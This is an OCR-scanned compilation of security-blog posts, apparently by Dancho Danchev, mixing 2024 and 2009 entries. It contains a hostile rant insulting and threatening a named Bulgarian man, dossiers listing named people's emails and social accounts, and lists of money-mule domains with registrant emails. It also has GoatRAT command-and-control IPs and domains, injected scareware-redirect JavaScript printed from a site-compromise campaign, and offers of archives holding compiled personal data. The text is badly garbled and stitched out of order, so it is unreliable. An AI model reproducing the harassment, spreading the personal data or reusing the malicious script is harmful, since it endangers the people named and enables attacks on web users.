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1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhKPW8200GMNgFuVhhOFRMk2Xxof cou5iCByRY_INDopfWcq 


nH8F ZEc JMLb6xJ162mUzLZoFCEyMejxNNZ_VuCI91kI1CyC5cCTE 


2. https://ddanchev. blogspot .com/2023/11/where-is-anton-nikolaevich-korotchenko.htm 


3. https://ddanchev. blogspot .com/search?q=koobface&max-results=20&by-date=true 

4. https: //blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEjeg4v6QOncvXPlpIZuyQbf gmJxPYWP9d6Yq208BnQ8UkVv 
5. https: //blogger . googleusercontent .com/img/b/R29VZ2x1/AVvXsEj8kya01j1Y7cto_8uBIx7-322yj jEMyxjHOOuWy8Ztdb-gQ 
6. https:/fologger. googlousercontent.con/ing/o/R29v22x3/AWHaBgu jr AANxz0JBAKB06766 InP TUaQkaSeT&re 


rLeGV-pYBuCWhdd7Y1MKTcaft17aA0udVggEt8thxF6casUPsr6hel 
7. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEhPxILS5Q JdAo6PzkiVOdrBy03BvBUt j J7u3hcDsZUQBt cC 
hzLYcEeETmYXHyTOO1vtpBbLgBvQis6VoctvDNRc5x20UV98c5I3 


20.1.4 The Deepest Gipsy King of Them All? - Yavor Kolev - A Dipshit Courtesy of 
Republic of Bulgaria on the "International" - "| Have Never Left the Country" 
Law Enforcement "Scene" (2024-01-10 04:35) 


he 


[1] 


286527 


Can you recognize apologies spot a dipship when you see one? Can the recognize the degra- 
dation between his teeth or what would some other dipshits courtesy of him that don’t exist 
would consider something that doesn’t exist to begin with the very presence of a human being 
his teeth and relevant face sculpture to begin with? 


This is not poetry. This is the deepest ugliest and most disgusting presence that | would stay a 
million mile away to skip his relevance of existence to begin with. 


There’s a saying. The ones who are distusting are disgusting at all. Beware and don’t even 
bother the elaboration on this. Watch out for the irrelevance of these people and try to avoid 
them to the bottom of your brains out and there’s not such word as out. The dipshitness of 
your overall irrelevance is bothering other to be bottom of their irrelevance. The result? You 
don’t exist. At all. 


If you can spit it try to vomit it but vomit the bottom of your brain’s and idiocity’s irrelevance 
to the bottom of your brain’s out. We will find and beat the bottom of your irrelevance out to 
the bottom of your irrelevance out. You’re a disgusting presentation of people who dipshit on 
each other and then skip the breakfast. And guess what? The dinner. 


Stay tuned. But you don’t. 


1. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVVXsEhRDKUWSNzZ8NUoM4cMFnSy7tVSmo_3T6KUJHR1imGAOfxY9X: 
NP3ZITiw_EH6LDC64PwWyNNwmSyg5Ur JV4CSHqixZCLH_YF3Uev-pH 
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20.1.5 Profiling Russia’s Internet Research Agency Project Lakhta 
Mikhaylovich Lifshits (2024-01-12 22:07) 
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fez CLUB 
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21.00-06.00, 


Cory eo 


[1] 


An image is worth a thousand words. Here’s the [2]link. 


Personally identifiable information: 
Email: artemlv@hotmail.com 


mycryptodeals@yandex.ru 


Vkontakte accounts: 
hxxp://vk.com/id5856430 


hxxp://vk.com/shOrtnam3 


hxxp://vk.com/artemous 


Web site: hxxp://smart-shopping.club 
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landgroupinc .net - Email: MarcusStraker909@gmail.com 
land-groupsvc .cn - Email: abuseemaildhcp@gmail.com 
land-groupsvc .com - Email: bias@co5.ru 

libertygroup .cc - Email: LindseyKimSI@gmail.com 
lime-groupnet .cn - Email: abuseemaildhcp@gmail.com 
lime-groupsvc .cn - Email: abuseemaildhcpo@gmail.com 
margin-groupco .cn - Email: Gregory.Michell2009@yahoo.com 
margingroupinc .cn - Email: regory.Michell2009@yahoo.com 
massivegroupsvc .cn - Email: abuseemaildhcp@gmail.com 
mastergroupinc .cn - Email: abuseemaildhcp@gmail.com 
master-groupinc .com - Email: taffy@blogbuddy.ru 
master-groupsvc .cn - Email: taffy@blogbuddy.ru 
mellis-group .cn - Email: abuseemaildhcp@gmail.com 
mellis-groupmain .cn - Email: abuseemaildhcp@gmail.com 
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mena-groupsvc .cn - Email: abuseemaildhcp@gmail.com 
nvidia-groupnet .cn - Email: Gregory.Michell2009@yahoo.com 
nvidia-groupsvc .cn - Email: Gregory.Michell2009@yahoo.com 
opm-groupli .com - Email: entrap@namebanana.net 
phoenix-groupco .net - Email: MarcusStraker909@gmail.com 
phoenix-groupmain .cn - Email: abuseemaildhcp@gmail.com 
premier-groupinc .cn - Email: abuseemaildhcp@gmail.com 
premier-groupinc .com - Email: gone@corporatemail.ru 
premier-groupnet .cc - Email: justin dickerson@ymail.com 
prime-groupco .cn - Email: abuseemaildhcp@gmail.com 
prime-groupinc .cn - Email: abuseemaildhcp@gmail.com 
puritan-groupco .cc - Email: justin _dickerson@ymail.com 
puritan-groupco .cn - Email: abuseemaildhcp@gmail.com 
puritan-groupinc .cn - Email: abuseemaildhcp@gmail.com 
puritan-groupinc .com - Email: gone@corporatemail.ru 
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realtek-groupnet .cn - Email: Gregory.Michell2009@yahoo.com 
realtekgroupsvc .cn - Email: Gregory.Michell2009@yahoo.com 
reddbutton .cn - Email: morgan.greg@yahoo.com 
redeye-groupco .cn - Email: abuseemaildhcp@gmail.com 
redeye-groupinc .cn - Email: abuseemaildhcp@gmail.com 
regency-groupco .com - Email: gone@corporatemail.ru 
regency-groupnet .cc - Email: justin dickerson@ymail.com 


regency-groupnet .cn - Email: abuseemaildhcp@gmail.com 
safegroupsvc .cn - Email: Gregory.Michell2009@yahoo.com 
saturn-groupsvc .cn - Email: darry wisp@yahoo.com 
scope-group .cn - Email: don.ram@yahoo.com 
scope-groupmain .cc - Email: darry _wisp@yahoo.com 
scope-groupmain .cn - Email: abuseemaildhcp@gmail.com 
stargroupinc .cn - Email: abuseemaildhcp@gmail.com 
star-groupinc .net - Email: MarcusStraker909@gmail.com 
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star-groupsvc .cn - Email: abuseemaildhcp@gmail.com 
star-groupsvc .com - Email: taffy@blogbuddy.ru 
summit-groupinc .cn - Email: Gregory.Michell2009@yahoo.com 
theblackend .cn - Email: morgan.greg@yahoo.com 
totallysmiled .cn - Email: morgan.greg@yahoo.com 
vector-groupfine .cn - Email: justin _dickerson@ymail.com 
vision-groupinc .cc - Email: vision-groupinc.cc 

vision-groupsvc .com - Email: gone@corporatemail.ru 
windcontrol .cc - Email: morgan.greg@yahoo.com 


Nothing’s isolated, everything’s connected, and sadly orchestrated by a very distinct set 
of cybercrime enterprises, the market share leaders. 


Related posts: 

[9]Standardizing the Money Mule Recruitment Process 
[10]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[11]Money Mules Syndicate Actively Recruiting Since 2002 
[12]Inside a Money Laundering Group’s Spamming Operations 


This post has been reproduced from [13]Dancho Danchev’s blog. 


1 hittp:/édanchev blogepot  con/2008/20/standardizing-eoney-aule-recrultnont. hal 
2, ftp: / er fos. goe/pressrel/preserel00/ach_110509.nt] 

3. http://www. google .com/safebrowsing/diagnostic?site=AS : 38356 

4. hetp://sois.doneintools..con/222. 35.197 254 

5, http://shois dosaintocls.con/222. 5.137.236 
6 
7 
8 
9 


| http://shots donaintools.con/222. 95.137. 257 

| http://shois domaintools.con/222. 5.187.298 

_hetp://adanchov blogspot. con/2009/10/standardizing-noney-mule- recruitment, Hal 
10, http: //ddanchev. blogspot .con/7008/07 /noney-mule-recruiters-use-aeproxs-fastal 
11. http://ddanchev. blogspot . com/2008/10/money-mules-syndicate-actively.html 


12. http://ddanchev. blogspot .com/2009/05/inside-money- laundering-groups- spamming. html 


13. http://ddanchev. blogspot .com/ 


. http: //whois.domaintools.com/222. 35.137 .236 


5.11.6 One Year Worth of Zeus Crimeware Development Through the Eyes of the 
Cybercriminal (2009-11-16 23:31) 


Despite the fact that the Zeus crimeware kit is a victim of " 


Managed Cybercrime-as-a-Services as a commodity 


Related posts: 
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20.1.6 Profiling Internet Research Agency’s Anna Vladislavovna Bogacheva 
(2024-01-12 22:08) 


[1] 


CTABPONONb S| | 


An image is worth a thousand words. Here’s the [2]link. 
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[3] 


1. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVVXsEj3YGUsAy0vyG6SzbTz53zhasCnLdBPSov6z2ywYDSgBKN1- 
Z9358VR90al 9MTTq8vW_A1lb1KsOXvmihzZVVGgDBI1qz043H4ZK1 


2. https: //www.fbi.gov/wanted/counterintelligence/anna-vladislavovna-bogacheva 
3. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEirxwytZjRKXTOZx3uAeUr J£U98LFaq6vHgLfG1iCs6koRe 
JosVdTb6m2QReqORMy IPnswm6eHQ1xNzio8MctceERJE2KpnRZ9Zff 


20.1.7 Who’s Behind GoatRAT? (2024-01-13 23:01) 


Usuatio 


Senha 


ACESSAR 


In this brief analysis I’ll take a look at who’s behind GoatRAT in terms of social media activity 
C &C servers and actual personally identifiable information. 


Personally identifiable information: 
hxxp://bit[.]ly/nubankmodulo 
hxxp://goatrat[.]com/apks/apk20[.]apk 
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Sample MD5s: 
6583a9b6b83738e0bf2a261fc04483e18772da3241e467fdef37a8e27b1869a7 
9a8e85cflbbd32c71f0efa42ffedfla0 
hxxp://api[.]goatrat[.]com:3008 

Social Media: 

hxxp://t[.]me/sickoDevz 
hxxp://tl.]me/goatmalware 

Web site: 

hxxp://criminalmwl[. ]fun 
hxxp://clientes[.]criminalmw[.]fun 
WhatsApp - +5511987457894 
ba5833b49e2c6501f5bbce90b7948a85 
Code Signing Certificate Signed By: Mr[.] Paxton Doyle PhD 
SSL: 94ba7810ecelalb227e6a5b509c8bb228e7285ala5cee5f0ee26542783d4b09a 
Sample C &C servers: 
104[.]244[.]75[.]74 
138[.]197[.]166[.]92 
142[.]251[.]143[.]110 
142[.]251[.]143[.]129 
142[.]251[.]143[.]142 
142[.]251[.]143[.]163 
142[.]251[.]143[.]193 
142[.]54[.]162[.]114 
159[.]69[.]27[.]103 
174[.]128[.]250[.]164 
185[.]204[.]1[.184 

185[.]225[.]68[.]133 
188[.]214[.]132[.]49 
216[.]239[.]32[.]36 
216[.]239[.]34[.]36 

31[.]133[.]1[.]108 
51[.]148[.]150[.]203 

51[.]81[.]93[.]37 

80[.]241[.]214[.]102 
82[.]128[.]229[.]109 


28569 


93[.]115[.]91[.]66 

95[.]216[.]209[.]129 

Sample C &C servers: 

tgutjgo6kvqdst5ock[.]Jcom 

olbvu5pv2apkc57zfeg[.]Jcom 
hxxp://h4j7ewfdpwfzg6g6[.]com - 185[.]177[.]206[.]72 
hxxp://3ajzfjsxou4yzn3jw552dg[.]com - 87[.]236[.]195[.]198 
hxxp://f53ia7Iqhbg54y7xd7ydp3[.]com - 178[.]63[.]41[.]183 
hxxp://lblhluz7or[.]Jcom - 178[.]63[.]41[.]183 
hxxp://inylslu7vfq24vb[.]Jcom - 185[.]177[.]206[.]72 
51[.]81[.]56[.]136 

89[.]163[.]128[.]25 

81[.]7[.]16[.]177 

81[.]170[.J128[.]221 

109[.]70[.]100[.]71 

158[.]255[.]1[.]112 
j6jvmwagorhg4xpjkcy26d3i4au6pz6nyroqxreefmnl7yxgcruxzkmyd[.]onion 


Sample Photos: 


Sem eles, 
nada disso 
seria 
possivel 


sickoDevz Pereira Flyn 
CEO & Developer Adminisirador Administrador 


[3] 
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a) 


Tela Falsa 


© bot insere uma tela faisa do propio banco para 
© bico ndo ver o bot operands e ndo desconmiar 
do absolutamente nada 


[4] 


Device Logs 


Veja sokios bancarios e todo 
processo do bot utilizando o 
mecanismo de Device Logs 


[5] 


Por Que Escolher A Criminal? 


Resumo rapido é 
somente aqui ! 


ce) Nés da equipe Criminal trabalhamos 


dia e noite para adicionar funcées 
novas semanalmente e 
bancos/mecanismos novos para 
deixar seu trampo ainda melhor 


19) 


ATS 


Transtira todo valor da conta da 
Pessoa om segundos apenas fazendo 
ola abrir o propio bance 
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CriminalIMW Y . 


15 lmaginoy tirar toto dinhelro ce ATT AN 


Land Conia bancaria om saqusd 


IPeNnas instatando um virus F 
Iparoihe cia F 1? conheoa jaa 
CriminaiMw 


1. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEiAUSIRxNbL3Zsd1f YZ10-uM5C4uxZLrGegZ55Ins JRvIMOq 


9nnK9_LPqHLibdMiIHXTjYRDI5s_dKKOqGxNLjQMpPKOh3U1NpMXx2Q 


2. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEh1Bxlp2efLOUA7_JvpROaaNIyRV7QIB50xsa4YgimKk7_g4z 


G1VeLScL1JMkqwIYmvEzz2nLMT jn6KiatL_H8NEQkj1zirz71Qq- 


3. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEg7Lh3B1zd JQKkbMVvFx1GD59x1uCWVsa67 bdV6SA6Hmf6FD 


4. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEg7axt9T9ODPVYG2UxKz03m j TwuirqvRpCBNeXB93UV20FCT 
5. https: //blogger . googleuser content . com/img/b/R29v22x1/AVvXsEjGX7pyyqzck_o1Bdy71sn6ZcUUE4F2TciXEjMzT JOHVIX15 


20.1.8 Who Can Improve My Wikipedia Article? (2024-01-15 20:12) 


Who can assist and improve my [1]Wikipedia article? 


Thank you. 


[2] 
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5.11.7 Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
(2009-11-17 22:36) 


[1]Ali Baba and the 40 thieves LLC are once again multi-tasking, this time compromising 
[2]hundreds of thousands of web sites, and redirecting Google visitors - through the standard 
http referrer check - to [3]Scareware serving domains. 


<html> 

<!-- LABSL_CODEC --> 

<head> 

<title>Loading</title> 

qneta names"rcbots” centent*“noindex, nofollow, noarchive™> 

<soript> 

function bandlefrror () (try( window. parent. location= location; ) catch (e) ()try( window. top. location= location; ) catch (e) ()) window. onerror*handlefrror; if (vind 
</script> 

<eoript> 

if (location. href. indexOf(‘console*yes'} ‘= ~%) ¢ 


if (navigator .appiersion. indexOr("ESIE'} > 0) ( window.isIE = true: function msieversion() ( var ua * window. mavigator.userAgent: var msie = ua. ind 
function openPangerVindow(adr) { if (window.isI£) ( if (window, IEversion < 6) { vimdow.open(adr); ) else ( try | document. getElement DyId(' ite’). daunc 
function exiter()( openDangerVindow(visdow. location. href): openDangerVisdow(dangerVindidr): return false: } 
if (vindov.attechEvent) eval ("vindov.attechEvent ('onunload’,exiter):"}; else window.seddiventListener("uniond™, exiter, false): 
, 
</woript> 
<script Cype**text/ javascript ">document.vrite('<O8J"+' ECT ide"i'e*'te™ width="0" hesght="0" style**position:absolute;: left:O0;top:0:" CLAS’ s'SIb="CLs'« 
<soript language="jovascript">AC_FL_RumContent = 0:</soript> 
<aeript language” pavascript™> 
ver isIE = (navigator.appVersion, indexOft ("MSIE") '= -1) ? true : false: 
var is¥in = (navigator.appVersion.toLowerCare().iadexOf("win™) ‘= -3) ? true : false; 
var 1s0pera = (navigator.userAgent. indexOt (“Opera”) ‘= -1) ? true : false: 
function ControlVersion() ¢ 
var version: 
var ano: 
var e: 
try t 
axo * new ActivexXObject ("ShockwaveF lash. ShockwaveF lash. 7"): 
version = axo.GetVariable(*fversion"): 
} catch fe) 0) 
if ('version) ¢ 
ery t 
axo = nev ActiveXObject ("ShockvaveF lash. ShockvaveF lash. 6"): 
version = "¥IN 6,0,21,0"; 
axo.AllovScriptéccess = “always”: 
version = ano. GetVariable("fversion") > 


What’s so special about the domains mentioned in Cyveillance’s post, as well as the ones 
currently active on this campaign? It’s the Koobface connection. 


For instance, the ionisationtools .cn or moored2009 .cn redirectors, as well as the scare- 
ware serving premium-protection6 .com; file-antivirus3.com; checkalldata .com; foryoumal- 
warecheck4 .com; antispy-scanl1 .com mentioned in post, are the same scareware redirectors 
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6 Darah Dene Demon 


1. https://en.wikipedia.org/wiki/Draft :Dancho_Danche 


2. https: //blogger. googleusercontent . com/img/a/AVvXsEi02Z-aeWX4D3t YDEatdFSOwP4oT JB9wNVOM-OnyOmKHJ79Pr9IDXybdA 
DOM-4FsclMmPaepoeFbJ_MsitPsx1Ua15zVJ9wKcLodgQ1xIAtQBi 


20.1.9 Retiring (2024-01-16 18:37) 


[1] 
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popes - 
2 ~-MEMORABILIA 


= | by. Dantho Danchey-; aoe ses 
‘nttps: HHadanchev, blogspot.com =~ 
-Eniait t:dancho, danchev@hush. com. = 


—— 


2S. 


I’m retiring. Ebay memorabilia auction soon with some surprises. I'll post a link here. All of my 
research 2005-2023 here - [2]https://archive.org/details/@ddanchev Yours sincerely. Dancho 


[3] 
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(3 


‘e te Wee fewte: foe re 


2@e@ &. 


Gmail Cree 


Gr 


» « Danche Danchey 


Search att o mete 0 


* bete a herd 


Search De wee 


na hes © yrote Coeets ames Wped cera Gesmeteo 


Vare omeee? 


[4] 


Die eet aciise 
Catastne 


Reheat 


danche denchev@gmail.com Seness tein | Sage cut > 
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Dancho Danchev 
From Wikipedia, the free encyclopedia 


Ree EE eee ne ees Se Dancho Danchev 
Contents Citizenship Bulgarian 
1 Career Occupation Security researcher 
2 Koobface investigations Website 
3 2010 Disappearance Dancho Danchov's bog 
4 References 
5 External links 
Career tes! 


Danchev is known for discovering computer virus and spamming attacks a5 they surface on the Internet, and 
providing details on the new threats.!?! As a security researcher, he has been the first person to report major 
malware campaigns as they begin to take form.!2! Danchev has also discussed the use of new technology, like 
USB keys. and their potential effects on the internal security of the computer systems of major corporations, !?! 
Face CN a wane OF ON ONY Ok SONOS breaking through Internet security protocols as 
weit |* 


His blog posts and articles have included explanations of the overall landscape of the underground malware 
industry in countries like Russia and China,!>!!! in addition to the use of the internet by terrorist networks,!7"8! 
The entities he has reported on include volunteer militias of hackers that independently attack the servers of 
enemy nations while their countries are in the midst of military operations, such as Russia's involvement in 
Georgia,!*) in 2009 he discovered that the indian embassy in Spain had been taxen over to serve matware to 
those who visited the site.!!°l He also reports on the hacking of major corporate websites,!?#!!!2)13) 

Specific attacks that Danchev provided initial analysis for include a “Chinese hacktivist” attack on CNN.com in 
2008;!24!!15) the Operation Ababil attack on Wells Fargo. U.S. Bank and PNC Bank;!!®! 4 2009 malicious comment 
attack on YouTube and Digg.com;!!?! a large 2010 blackhat SEO campaign affecting both Bing and Google 
searches; "8! 3 2009 New York Times malvertisement attack:!?9) and a 2010 attack on Network Solutions,!?0! 


Koobface investigations {ea} 


In February 2010 Danchev posted an article called “10 things you didn’t know about the Koobface gang”, 
discussing various interactions he has had with them (they once redirected the Focebook website to his blog) and 
other pleces of information, in May the creators of the malware then forced its network to post o point by point 
response to the article on the screens of ail the computers they had infected.!?2! Danchev continued his 
investigations into the gang, eventually posting the full biographical details of some of its members on his 
blog.!??! 


2010 Disappearance (ess) 


In late 2010 ZONer, which Danchev co-wrote, reported that he had disappeared from home in Bulgaria and was 
feared harmed.!?3! On September 11, 2010 he submitted what would be his final post of the year, writing about 
a “cyber jihad™ and during that month he also sent letters to friends stating that he was concerned that he was 
under surveitiance.!**! After his disappearance ZDNet received a messaqe statina that "Dancho's alive but he's 


[5] 


Dancho, HBGary is interested in talking w/ you about Threat 
Intelligence 


From:greg@hbgary.com 

To: dancho. danchev@gmail.com 

Date: 2009-04-15 13:02 

Subject: Dancho, HBGary is interested in talking w/ you about Threat Intelligence 


Dancho, 


My company, HSGary, is developing a new business unit which we call “Global 
Services”. A keystone of the offering is tracking human and organizational 
factors behind malware threats. Your work, and some of the work of your 
peers, seems to be very good analysis in this area. Since the space is new 
to us, I want to tap the best minds in the industry to help us develop an 
offering. Would you be interesting in spending some time with our team to 
discuss your work and methodology? On the market side I am also trying to 
pin down what customers will actually pay for, and perhaps you have some 
insight here as well. I am willing to hire you as a consultant, and/or pay 
for your time and travel in any way that works for you. I will be at RSA 
next week, and our company has an event for customers in San Jose in the 


first or second week of May. I also travel to Washington DC quite alot. 


[6] 
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1 
2, httpe://archive.org/detaile/Sddanchev 

3 
4 
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20.1.10 Auction Onion (2024-01-18 14:25) 


Dancho Danchev's Dark Web Onion 1.5TB OSINT/Cybercrime Research and Threat 
Intelligence Gathering Personal Memorabilia Files 2010-2023 Private Torrent Dark Web 
Auction 


https://ddanchev.blogspot.com 
Email: dancho.danchev@hush.com 
Wire Bank Transfer Details for This Dark Web Auction Available On Request Using Email 


Auction Bids For My Private Personal Files 2010-2023 Memorabilia Torrent [1.5TB] 
[ZIP] Start At $85,000 


Full Directory Listing in HTML Available As A Teaser Using Email 


Dear Dark Web Onion visitor, 


his is Dancho Danchev (https //ddanchev Dlogspot com) and fm proud to welcome you to my Dark Web Onion 
wetion Web site. 


eywords: Dark Web, Dark Web Onion, Hacking, Hacker, Hackers, Dancho Danchevy, Intelligence, intelligence 
Studies, intelligence Community, NSA, GCHO, Cyber intelligence, Malicious Software, Malware, Cyber 
Surveillance, Eavescropping, Wiretapping, Top Secret, Classified, Top Secret Program, Classified Program, 
ybercrime, Data Mining, Big Data, Cybercrime Research, Threat Intelligence, Security Industry, Information 
Security, information Security industry. Computer Security, Computer Hacking, Network Security, Network 
lacking, OSINT, Russia, Iran, Russian Hackers, iranian Hackers, Russian Cybercriminal, Cybercrime Forum, 
ybercrime Forum Community, Astalavista, Astalavista. box sk Box. sk, Box sk Network, Cracks, Serials 
Keygens, Key Generators, Hacker Search Engine, Cracks Search Engine, Serials Search Engine, Threat 
Melligence, Cybercrime Research, Malware, Malicious Software, Botnet, Botnets, Reverse Engineering, Kali 
inux, Metasplo#, CVE, Bluetooth, RFID, Wireless, Tools, Bruteforce, Social Engineering, XSS, SQL Injection 
Secure Coding, Exploit, Vulnerability, Bug Bounty, Exploit Kit, Zero Day, Patch Tuesday, Fuzzing, Framework 
Remote Code Execution, SOCMINT, Dark Web, Deep Web, Metadata, EXIF, OPSEC, Maltego, Palantir, SIEM 
indicator of Compromise, Advanced Persistent Threat, TTP, Malware Tracker, Malware Blockist. Threat 
Intelligence Feed, Threat Intelligence API, MISP. STIX, Command and Control, Malware Feed, OpenCT| 
Malware Sandbox, Javascript Obfuscation, Reverse Engineering, Honeypot, MD5, Malware Sample, Passive DNS, Domainkeys, IP Reputation, Blacklist, Spam 
Filtering, Spam Solution, Spam Feed, Bayesian Filter, Heuristic Filter. Temporary Email, Blackhat SEO, Phishing Framework, Phishing Template, SPF, Spear 
Phishing, Phishing Report, Security Training, Typosquatting, Domain Reputation, Phishing Kit, P2P Botnet, Botnet Shutdown, Botnet Sinkole, IRC Botnet, ASN 
Monitoring, Linux Malware, Botnet Mitigation, Spam Botnet, DDoS Botnet, Botnet Tracker, VPN, SSL Encryption, Full Disk Encryption, End-to-Enc Encryption 
Cookie Tracking, Do Not Track. Tor Network, NSA. GCHQ, Browser Finterprint PGP, OTR. OMEMO, SSL, ONSSEC, IPSec, Encrypted Email, Encryption Tool, Zero 
Knowledge Backup, Ethernet Encryption, APT, Money Mule. Re-Shipping Fraud, Credit Card Fraud, Hacker Group, Web Site Defacement Mobile Botnet, loT 
Botnet, Router Botnet, 2FA Cryptohippie, Exit Node, OpenVPN, Wireguard, VPN Jurisdiction, VPN No Logs, VPN Router, Free VPN, VPN Trial, VPN Technology 


[2]Dark Web Onion. 


1. https://blogger .googleusercontent .com/img/a/AVVXsEi0QwGUTiBcAfWdgc_Fxidmq9xkLbvTIPoLCwQr9EeWN6SslktwheNnc 
6EKEO45 j JZpmC IW] C2ADMAiA8vGOCQs1C8laNf9Bg4xP8H5dsFooah 
2. http: //cnaomocftxw3wh7gyyct5kpf3rctteornc7uup7ak4oiyy35ypvd31id. onion/ 


20.1.11 Research Compilation 2005-2023 - Torrent (2024-01-20 00:47) 


[1] 
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Cybercrime_Forum_Data_Set_2021.rar 39.4 GB 
Dancho_Danchev_Astalavista_Security_Newsle... 288 MB 
Dancho_Danchev_Blog_Archive_ JSON_2021.rar 4.15 MB 
Dancho_Danchev_Blog_E-Book_Archive_2021.... 6.06 GB 
Dancho_Danchev_Cyber_Threat_Actors_Analy... 9,24 MB 
Dancho_Danchev_Cybercrime_Research_2021_... 754 kB 
Dancho_Danchev_Cybercrime_Research_Prese... 10.9 MB 
Dancho_Danchev_Intelligence_Community_2.... 1008 MB 
Dancho_Danchev_Interview_DW_Koobface_Bo... 2.65 MB 
Dancho_Danchev_Iran_Hackers_Personally_Ide... 3.04 GB 
Dancho_Danchev_Iran_White_Paper_2021.rar 255 MB 
Dancho_Danchev_Iran_White_Paper_Part_Two... 9,99 MB 
Dancho_Danchev_Keynote_Koobface_Botnet.... 163 MB 
Dancho_Danchev_Malware_Trends_White_Pap... 2.41 MB 
Dancho_Danchev_Medium_Research_Compila... 60.7 MB 
Dancho_Danchev_Personal_Memoir_Compilat... 164 MB 
Dancho_Danchev_Private_Party_New_Year_Vid... 541 MB 
Dancho_Danchev_Security_Policy_White_Pape... 2.41 MB 
Dancho_Danchev_Twitter_Account_Archive_2... 864 kB 
Dancho_Danchev_Unit-123_Security_Research... 27.4 MB 
Dancho_Danchev_Webroot_Research_Compil... 602 MB 
Dancho_Danchev_ZDNet_Research_Compilati... 464 MB 
WhoisXML_APL Research_Articles_2021 rar 48.6 MB 
UPDATE: 
[2 ]New link. 


[3] 
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iB Cybercrime_Forum_Data_Set_2021 61,120,172,747 


| Dancho_Danchev_Blog_E-Book_Archive_2021 6,512,017,221 
QO Dancho_Danchev_lran_Hackers_Personally_Identifiable_Information_Compilation_2021 3,271,685, 164 
| Dancho_Danchev_Cybercrime_Personal_Photos_Ecosystem_2021_Compilation 1,655,693, 139 
a Dancho_Danchev_Intelligence_Community_2.0_Dark_Web_Onion_Backup_2021 911,383,016 
a Dancho_Danchev_ZDNet_Research_Compilation_2021 692,896,821 
O Dancho_Danchev_Webroot_Research_Compilation_2021 692,896,821 
BY Dancho_Danchev_Private_Party_New_Year_Videos_Compilation 659,396,866 
im Dancho_Danchev_lran_White_Paper_Part_Two_2021 348,769,928 
ia Dancho_Danchev_Astalavista_Security_Newsletter_Compilation_2021 348,769,928 
4 Dancho_Danchev_lran_White_Paper_2021 268,079,837 
| Dancho_Danchev_Personal_Memoir_Compilation_Research_2021 186,005,904 
ny Dancho_Danchev_Keynote_Koobface_Botnet_CyberCamp_2021 176,572,076 
fa Dancho_Danchev_Medium_Research_Compilation_2021 69,817,301 
|_| WhoisXML_API_Research_Articles_2021 56,543,476 
QO Dancho_Danchev_Unit-123_Security_Research_Compilation_2021 31,856,017 
0 Dancho_Danchev_Cybercrime_Research_Presentations_2021 12,329,249 
| Dancho_Danchev_Cyber_Threat_Actors_Analysis_Research_Compilation_2021 10,129,788 
ie Dancho_Danchev_Security_Policy_White_Paper_2021 5,057,044 
mY Dancho_Danchev_Malware_Trends_White_Paper_2021 5,057,044 
ie Dancho_Danchev_Interview_DW_Koobface_Botnet_MP3_2021 2,838, 160 
| Dancho_Danchev_Cybercrime_Research_2021_Personally_ldentifiable_Information_Compilation 2,409,268 
ie Dancho_Danchev_Twitter_Account_Archive_2021 884,810 


1. https: //blogger. googleusercontent.com/img/b/R29VZ2x1/AVvXsEhbty yHD-wb5Vv4xbULUHGTaQwWYd-vBDs57ygQLC4NjDRf 


1c8xMTIZEjxfUnxX0Um1fbCyucApV9J9HIisBU7v jhBw-Md9Q5IQaz 
2. https://drive.google.com/file/d/1bmwTz0tVb2Vxqp5Wc7xSy_UFnmxmJW4Y/view?usp=shar ing 
3 


20.1.12 Cybercrime Forum Data Set - 2024 - Torrent (2024-01-20 11:09) 


[1] 

8 Archive_01 10/21/2022 4:20 PM WinRAR archive 95,241 KB 
8 Archive_02 10/21/2022 5:38 PM WinRAR archive 392,519 KB 
8 Archive_03 10/21/2022 4:38 PM WinRAR archive 159,028 KB 
HEE Archive_04 10/21/2022 3:54 PM WinRAR archive 12,161 KB 
8 Archive_05 10/21/2022 5:55 PM WinRAR archive 338,750 KB 
HB Archive_06 10/22/2022 7:43 AM WinRAR archive 129,025 KB 
8 Archive_07 10/21/2022 5:04 PM WinRAR archive 562,089 KB 
$8 Archive_08 10/21/2022 2:42 PM WinRAR archive 691,458 KB 
| Archive_09 10/21/2022 5:03 PM WinRAR archive 248,050 KB 
8 Archive_10 3/7/2022 7:13 AM WinRAR ZIP archive 721,586 KB 
8 Archive_11 6/23/2022 6:22 AM WinRAR ZIP archive 271,104 KB 
8 Archive 12 6/23/2022 6:22 AM WinRAR ZIP archive 268,032 KB 

UPDATE: 

[2]New link. 
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$B Cybercrime_Forum_Data_Set_2024_01 
Eo | Misc_01 

Ee | Misc_01 

Ew | Misc_03 

Ew | Misc_04 

9 Archive_01 


8 Misc_01 

EB Archive_10 
EE Archive_08 
88 Archive_07 
| Archive_02 
9 Archive_05 
8 Archive_11 
wo | Archive_12 
8 Archive_09 
8 Archive_03 
HEE Archive_06 
E Archive_01 
EE Archive_04 


BB Cybercrime Forum_Data_Set_Archive_2022 
BB Cybercrime Forum_Data_Set_2021 

BB cybercrime Forum_Data_Set_Archive_2019 

© Misc_o1 

BB Cybercrime Forum_Data_Set_Archive_2021 
Eo | Cybercrime_Forums_Compilation_2021_08 
Ee | Cybercrime_Forums_Compilation_2021_08_01 
Ea | Cybercrime_Forums_Compilation_2021_10 
Eo | Cybercrime_Forums_Compilation_2021_09 

Fw | Cybercrime_Forums_Compilation_2021_09_01 
Ea | Cybercrime_Forums_Compilation_2021_08_02 
| Cybercrime_Forums_Compilation_2021_05 
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[3] 


1/19/2024 2:54 AM WinRAR archive 
12/22/2023 3:48 PM WinRAR ZIP archive 
10/21/2022 5:04 PM WinRAR archive 
9/7/2023 12:51 PM WinRAR ZIP archive 
9/7/2023 1:06 PM WinRAR ZIP archive 
10/21/2022 4:20 PM WinRAR archive 
[4] 
10/22/2022 7:50 AM WinRAR archive 
3/7/2022 7:13 AM WinRAR ZIP archive 
10/21/2022 2:42 PM WinRAR archive 
10/21/2022 5:04 PM WinRAR archive 
10/21/2022 5:38 PM WinRAR archive 
10/21/2022 5:55 PM WinRAR archive 
6/23/2022 6:22 AM WinRAR ZIP archive 
